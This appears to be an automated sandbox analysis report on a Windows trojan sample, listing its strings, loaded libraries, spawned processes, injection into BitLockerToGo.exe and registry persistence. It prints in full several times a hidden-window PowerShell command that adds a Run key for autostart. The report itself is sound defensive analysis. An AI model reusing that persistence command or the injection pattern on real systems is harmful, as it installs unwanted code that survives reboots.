      Source: powershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: BwqqVoHR71.exe | String found in binary or memory: https://picsum.photos/208/500
      Source: BwqqVoHR71.exe | String found in binary or memory: https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02x
      Source: BwqqVoHR71.exe, 00000000.00000000.1294863866.000000000051E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: directInput8Creatememstr_e20c21ac-f
      Source: BwqqVoHR71.exe, 00000000.00000000.1294863866.000000000051E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: DwmGetColorizationColorDwmIsCompositionEnabledSetThreadExecutionStateRegisterRawInputDevicesglfw: invalid shape: %dunexpected operator: %sredeclared function: %sinvalid length of arrayinvalid length array %d%v is not a valid token0123456789abcdefABCDEF_function %q not definedmissing protocol schemeinvalid URI for requestflate: internal error: too many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classunknown character widthwhile scanning an aliaspattern bits too long: missing type constraintunbalanced label scopesobject already resolvedmissing required key %sinvalid unicode literalunsupported encoding %vproperties: Line %d: %scircular reference in:memstr_983a9040-8
      Source: BwqqVoHR71.exeStatic PE information: invalid certificate
      Source: BwqqVoHR71.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BwqqVoHR71.exe
      Source: BwqqVoHR71.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.000000000251E000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004323000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000003508000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004906000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3157476707.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .vbpb
      Source: classification engineClassification label: mal72.troj.evad.winEXE@7/4@0/6
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ilc5z5z.rdx.ps1Jump to behavior
      Source: BwqqVoHR71.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: BwqqVoHR71.exeReversingLabs: Detection: 28%
      Source: BwqqVoHR71.exeString found in binary or memory: , locked to threadruntime.semacreateruntime.semawakeupunexpected newlinevalue out of range298023223876953125Nashville-DavidsonDominican RepublicKorea, Republic ofRussian FederationFyodor DogstoevskyPrince of BarknessAmerican ShorthairEuropean ShorthairOriental ShorthairScottish DeerhoundNorwegian ElkhoundMiniature PinscherAustralian TerrierBedlington TerrierPatterdale TerrierDouble Bastard AleOrval Trappist Ale1098 - British Ale5733 - PediococcusBelgian Strong AleGulliver's TravelsMemoirs of HadrianPippi LongstockingCrossfire RoadsterGrand Cherokee 2wdGrand Cherokee 4wdTown & Country 2wdE150 Econoline 2wdFreestar Wagon FwdMonterey Wagon FwdTaurus Ethanol FfvC1500 Suburban 2wdX-type Sport BrakeL-140/715 GallardoClk350 (cabriolet)F150 Supercrew 4wdSylvester StalloneScarlett JohanssonMadam C. J. WalkerMarco Pierre WhiteArianna HuffingtonSir Donald BradmanMichael SchumacherSir Steve RedgraveHicham El GuerroujBerkshire HathawayCastle BiosciencesDocket Alarm, Inc.Forrester ResearchHarris CorporationHealthPocket, Inc.iFactor ConsultingInfoCommerce GroupMarinexplore, Inc.National Van LinesThe Vanguard GroupUrban Mapping, IncWay Better PatentsFully-configurableReverse-engineeredcontextually-basedlocal area networkMauritania OuguiyaMozambique MeticalNew Zealand DollarSaudi Arabia RiyalSaint Helena PoundSierra Leone LeoneTurkmenistan ManatYekaterinburg Time(UTC-10:00) Hawaii(UTC-09:00) Alaska(UTC-04:00) Cuiaba(UTC-01:00) Azores(UTC+02:00) Beirut(UTC+03:30) Tehran(UTC+06:00) Astana(UTC+08:00) Taipei(UTC+09:30) Darwin(UTC+10:00) 
HobartAfrica/Addis_AbabaAfrica/BrazzavilleAfrica/OuagadougouAmerica/Costa_RicaAmerica/Fort_WayneAmerica/Grand_TurkAmerica/GuadeloupeAmerica/HermosilloAmerica/KralendijkAmerica/LouisvilleAmerica/MartiniqueAmerica/MetlakatlaAmerica/MontevideoAmerica/MontserratAmerica/ParamariboAmerica/Porto_AcreAmerica/Rio_BrancoAmerica/St_VincentAmerica/WhitehorseAntarctica/McMurdoAntarctica/RotheraAsia/SrednekolymskAsia/Ujung_PandangAsia/YekaterinburgAtlantic/Jan_MayenAtlantic/ReykjavikAtlantic/St_HelenaAustralia/AdelaideAustralia/BrisbaneAustralia/CanberraAustralia/LindemanEurope/Isle_of_ManEurope/KaliningradPacific/Kiritimati
      Source: BwqqVoHR71.exeString found in binary or memory: buttonraised_hand_with_fingers_splayedapplication/x-pkcs7-certificatesapplication/vnd.ms-pki.certstorenats cucumber cream cheese bagelawesome orange chocolate muffinstuna red onion and parsley saladtomato cucumber avocado sandwichsimple pan fried chicken breastsroasted potatoes and green beansgolden five spice sticky chickenroasted cherry or grape tomatoescrushed red potatoes with garlicoriental asparagus and mushroomschocolate macadamia nut browniescream cheese walnut drop cookiesangelic strawberry frozen yogurtfew sandwiches short of a picnicmonkeys might fly out of my buttplease excuse my dear Aunt Sallybefore you can say Jack Robinsonin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lentotal sampling factors too largeunescaped < inside quoted stringbootstrap type already present: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurex509: unknown SignatureAlgorithminteger is not minimally encodedcannot represent time as UTCTimeber2der: BER tag length too longpkcs7: No certificate for signerbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectionGetVolumePathNamesForVolumeNameWreflect: NumOut of non-func type" not supported for cpu option "glfw: CreateWindowExW failed: %wglfw: GetRawInputData failed: %wglfw: TrackMouseEvent failed: %wthe requested API is unavailabletoo many arguments in call to %sconstant %s truncated to integerinit function is not implementedinvalid arguments for bool: (%s)invalid arguments for vec2: (%s)invalid arguments for vec3: (%s)invalid 
arguments for vec4: (%s)invalid arguments for mat2: (%s)invalid arguments for mat3: (%s)invalid arguments for mat4: (%s)UnknownBoolStringIntFloatComplexinvalid size %d (should be >= 0)expected end of string, found %qmalformed character constant: %scrypto/ecdh: invalid private keyed25519: bad public key length: crypto/des: input not full blockunexpected character, want colonwhile parsing a block collectiondid not find expected ',' or ']'did not find expected ',' or '}'found incompatible YAML documentincomplete UTF-16 surrogate pairwhile scanning a %YAML directivedid not find expected whitespacemultiple ,inline maps in struct nil type in named parameter listreadPythonMultilines: parsing %qValue %d for key %s out of rangedate time should have a timezonecouldn't parse binary number: %winput overflows the modulus sizeexpected: IDENT | STRING got: %sunimplemented Value for type: %sbasic string not terminated by "unexpected null character (0x00)Specific brand or variety of beerThe specific name given to a bookA problem with a web http requestHex or RGB arr
      Source: BwqqVoHR71.exeString found in binary or memory: x509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativegzip: invalid compression level: %dgzip.Write: Extra data is too largemime: bogus characters after %%: %qSubscribeServiceChangeNotificationsfile type does not support deadlinezlib: invalid compression level: %dglfw: AdjustWindowRectEx failed: %wglfw: CreateIconIndirect failed: %wglfw: GetModuleHandleExW failed: %wthe GLFW library is not initializedinvalid argument for enum parameterthe requested format is unavailablethe specified window has no contextglfw: invalid input mode 0x%08X: %wglfw: invalid window size %dx%d: %wglfw: invalid window opacity %f: %wopengl: unexpected attribute layoutno new variables on left side of :='_' must separate successive digitshash/crc32: invalid hash state sizerange can only initialize variablestransform: short destination bufferbigmod: modulus is smaller than natflate: corrupt input before offset too many Questions to pack (>65535)must set the input source only oncedid not find expected '-' indicatorfound extremely long version numberfound unexpected document indicatormethod must have no type parameters%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitybasic strings cannot have new linesunimplemented HCLToken for type: %sTime.UnmarshalBinary: invalid lengthAffectionate nickname given to a petAnimal name commonly found on a farmMeasures the alcohol content in beerABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789Blueberry banana happy face 
pancakes590c1440-9888-45b0-bd51-a817ee07c3f2?????@??????.com => billy@mister.comInterpret context record river mind.Cannot set children on terminal nodeThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)locale not found when calling %s: %vcrypto/cipher: input not full blocksbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closi
      Source: BwqqVoHR71.exeString found in binary or memory: buttonflag: British Indian Ocean Territorysouth_georgia_south_sandwich_islandsfailed to {hackerverb} {errorobject}variable assigned before declarationapplication/x-vnd.audioexplosion.mzzmelt in your mouth blueberry muffinssausage gravy for biscuits and gravyblueberry banana happy face pancakesbaby greens with mustard vinaigrettedon t burn your fingers garlic breadsalata marouli romaine lettuce saladlindas chunky garlic mashed potatoespan broiled steak with whiskey sauceyou kiss your mother with that mouthstick that in your pipe and smoke itjson: encoding error for type %q: %qmethod ABI and value ABI don't alignreflect.Value.Equal: values of type exceeded maximum template depth (%v)%s is not a method but has argumentswrong number of args: got %d want %dinternal error: associate not commonhttp://www.w3.org/XML/1998/namespacexml: end tag </%s> without start tagxml: %s chain not valid with %s flagx509: zero or negative DSA parameterx509: invalid CRL distribution pointx509: invalid subject key identifierx509: malformed algorithm identifierIA5String contains invalid characterinvalid boolean value %q for -%s: %vreflect: NumField of non-struct typeglfw: EnumDisplayMonitors failed: %wglfw: invalid cursor mode 0x%08X: %wglobal variables must be exposed: %sunexpected count of types in lhs: %dinvalid number of arguments for vec2invalid number of arguments for vec3invalid number of arguments for vec4invalid number of arguments for mat2invalid number of arguments for mat3invalid number of arguments for mat4multiplication of zero with infinityinvalid semicolon separator in queryno assembly implementation availablecrypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functioncompressed name in SRV resource datamust set the output target only onceunknown problem parsing YAML contentdocument contains excessive aliasingdid not find expected <stream-start>did not find expected version numberinvalid pattern syntax 
(+ after -): %s: cannot decode into interface: %Ttoml: cannot encode value of type %sedwards25519: invalid point encodingrange length is larger than capacityinvalid characters in heredoc anchortimezone hour outside of range [0,23]invalid type, must be array or object%s field could not parse to int valueDelimited separated unsigned integersWhether or not to have gaps in numberDay of the week excluding the weekendString Representation of a month nameReportAttemptingFullContext decision=French Principality Of Monaco (fr-MC)Inuktitut (Latin) Canada (iu-Latn-CA)Mongolian (Cyrillic) Mongolia (mn-MN)Uzbek (Latin) Uzbekistan (uz-Latn-UZ)Yi People's Republic Of China (ii-CN)` VirtualAddress is beyond 0x10000000cipher: message authentication failedcrypto/cipher: invalid buffer overlapcrypto/cipher: incorrect GCM tag sizebytes.Buffer: truncation out of rangecannot exec a shared library directlyvalue too large for defined data typetoo many symbols; file may be corruptruntime: allocation size out of range) is smaller than minimum page size (/cpu/classes/gc/ma
      Source: BwqqVoHR71.exeString found in binary or memory: span set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stategamepad: IDirectInputDevice8::EnumObjects failed: %wgamepad: IDirectInputDevice8::GetProperty failed: %wgamepad: IDirectInputDevice8::SetProperty failed: %wUnited Kingdom of Great Britain and Northern Irelandscrambled egg sandwiches with onions and red peppersbaked ham glazed with pineapple and chipotle pepperswrong number of args for %s: want at least %d got %dxml: EncodeElement of StartElement with missing namex509: cannot verify signature: insecure algorithm %vpkcs7: cannot parse data: unimplemented content typepkcs7: encryption algorithm parameters are incorrectpkcs7: encryption algorithm parameters are malformedConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWglfw: invalid parameter at Monitor.setVideoModeWin32math/big: cannot unmarshal %q into a *big.Float (%v)crypto/rsa: PSSOptions.SaltLength cannot be negativeinternal error: missing handler for resolver table: unexpected character 'i' while scanning for a numberunexpected character 'n' while scanning for a numberFirst meal of the day, typically eaten in the morningFixed width rows of output data based on input fields<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 Adverb that specifies the exact time an action occursAdverb that gives a general or unspecified time framePronoun referring back to the subject of the sentenceStatement formulated to inquire or seek clarificationCentral Atlas Tamazight (Arabic) Morocco (tzm-ArabMA)non-concurrent sweep failed to drain all sweep queuescompileCallback: argument size is larger than uintptrsync/atomic: compare and swap of nil value into Valuegraphics: fragment shader entry point '%s' is missingapplication/x-nokia-9000-communicator-add-on-softwarekittencals banana almond muffins with almond 
streuselreflect: non-interface type passed to Type.Implementsreflect.Value.Slice: string slice index out of boundsxml: %s.MarshalXML wrote invalid XML: <%s> not closedx509: certificate specifies an incompatible key usagebufio.Scan: too many empty tokens without progressingpacking: maxSize must be a positive power of 2 but %dshader: at most one //kage:unit can exist in a shadercannot use type %s as type %s in variable declarationmath/big: internal error: cannot find (D/n) = -1 for crypto/ecdh: internal error: mismatched isLess inputscrypto/elliptic: attempted operation on invalid point^[-+]?(\.[0-9]+|[0-9]+(\.[0-9]*)?)([eE][-+]?[0-9]+)?$did not find expected alphabetic or numeric characterType of animal, such as mammals, birds, reptiles, etc.Person or group creating and developing an applicationScale indicating the concentration of extract in wortsSix-digit code representing a color in the color modelDesignated official name of a business or organizationcall to Fake method did not return an unsigned integerWord that modifies verbs, adjectives, or other ad
      Source: BwqqVoHR71.exe | String found in binary or memory: net/addrselect.go
      Source: BwqqVoHR71.exe | String found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/data/address.go
      Source: BwqqVoHR71.exe | String found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/address.go
      Source: BwqqVoHR71.exe | String found in binary or memory: github.com/magiconair/properties@v1.8.6/load.go
      Source: BwqqVoHR71.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
      Source: unknown | Process created: C:\Users\user\Desktop\BwqqVoHR71.exe "C:\Users\user\Desktop\BwqqVoHR71.exe"
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: d3dcompiler_47.dll
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winmm.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: powrprof.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: umpdc.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: textshaping.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: textinputframework.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: coreuicomponents.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wintypes.dll
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAutomated click: OK
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: BwqqVoHR71.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: BwqqVoHR71.exeStatic file information: File size 19172088 > 1048576
      Source: BwqqVoHR71.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4dca00
      Source: BwqqVoHR71.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc87e00
      Source: BwqqVoHR71.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
Source: BwqqVoHR71.exe; Static PE information: section name: .symtab

Boot Survival

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2722
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240; Thread sleep count: 2722 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 800; Thread sleep time: -922337203685477s >= -30000s
Source: BwqqVoHR71.exe, 00000000.00000002.1469508708.000000000189D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158529265.0000000003178000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F9D008
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8CC000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B78000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDB000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDC000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: C0A000
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
